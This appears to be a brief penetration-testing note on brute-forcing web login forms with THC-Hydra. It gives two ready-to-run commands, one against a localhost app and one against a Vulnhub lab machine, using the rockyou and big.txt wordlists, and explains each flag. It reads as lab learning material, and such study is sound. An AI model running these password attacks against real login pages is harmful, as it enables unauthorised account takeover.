THC-Hydra BruteForce

Localhost Example

$ hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form '/#/login:email=^USER^&password=^PASS^:Invalid email or password.' -fV -s 3000 -t 1

Vulnhub Example

When we enter a random key into the form at this page, we get “invalid key”. We can use this to formulate a hydra command. Choose big.txt wordlist, select http-post-form, the address 10.10.10.3, the location of the form “/kzMb5nVYJw/index.php” with our field “key” and the ^PASS^ string (the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^), and the third colon delimited argument that designates failure “invalid key”. -l is for our login name which is empty, -f is for exit when a login/pass pair is found, -V is for verbose.

$ hydra -P /usr/share/dirb/wordlists/big.txt 10.10.10.3 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -fV -l ""